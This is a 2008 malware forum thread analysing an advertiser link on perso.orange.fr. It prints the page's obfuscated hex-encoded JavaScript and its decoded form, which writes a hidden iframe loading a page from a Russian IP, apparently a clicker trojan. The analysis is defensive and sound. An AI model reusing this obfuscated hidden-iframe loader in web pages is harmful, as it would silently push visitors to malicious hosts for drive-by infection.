Malware Domain List

Malware Related => Malicious Domains => Topic started by: cconniejean on May 05, 2008, 01:56:09 am

Title: perso.orange.fr
Post by: cconniejean on May 05, 2008, 01:56:09 am
Code: [Select]
hxxp://perso.orange.fr/lightningbolttraffic/sites/
Checking this advertiser link that is posted above. My browser window shuts down. I'm seeing code in a script tag. LinkScannerPro says the above url has a link to a known exploit site. When trying to copy and paste at our forum we got a virus alert for virus js/psyme.qm and warnings on it interfering with the mysql somehow on the forum.
Title: Re: perso.orange.fr
Post by: Edgar Bangkok on May 05, 2008, 06:55:39 am
the site have javascript obfuscated
Code: [Select]
<script>function v481b6eb925459(v481b6eb925d85){ var v481b6eb926451=16; return(parseInt(v481b6eb925d85,v481b6eb926451));}function v481b6eb926c47(v481b6eb92703e){ function v481b6eb927c33 () {var v481b6eb92802f=2; return v481b6eb92802f;} var v481b6eb92743a='';for(v481b6eb927836=0; v481b6eb927836<v481b6eb92703e.length; v481b6eb927836+=v481b6eb927c33()){ v481b6eb92743a+=(String.fromCharCode(v481b6eb925459(v481b6eb92703e.substr(v481b6eb927836, v481b6eb927c33()))));}return v481b6eb92743a;} document.write(v481b6eb926c47('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6336323561306634207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323339363734292B273430363830313439636538385C272077696474683D343039206865696768743D353836207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
<CENTER>

after deobfuscated on have another script

Code: [Select]
<SCRIPT>window.status='Done';document.write('<iframe name=c625a0f4 src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*239674)+'40680149ce88\' width=409 height=586 style=\'display: none\'></iframe>')</SCRIPT>
point to russian site , but if i load direct this page link i receive only

Code: [Select]
Forbidden

You don't have permission to access /.if/go.html on this server.


MAybe need call the site at 
Code: [Select]
src=\'http://77.221.133.150/.if/go.html  whit different referer  or from other page.

Edgar   ;D
Title: Re: perso.orange.fr
Post by: cconniejean on May 05, 2008, 10:08:38 pm
Thank you Edgar. I just checked out your blog, nice.
Title: Re: perso.orange.fr
Post by: Edgar Bangkok on May 06, 2008, 03:27:36 am
Today rusiian site working  OK and i find hidden iframe with other javascript in page if.go

I think is the same described on  bit defender site at

http://www.bitdefender.com/VIRUS-1000262-en--Trojan.Clicker.HTML.IFrame.AR.html (http://www.bitdefender.com/VIRUS-1000262-en--Trojan.Clicker.HTML.IFrame.AR.html)

Edgar  ;D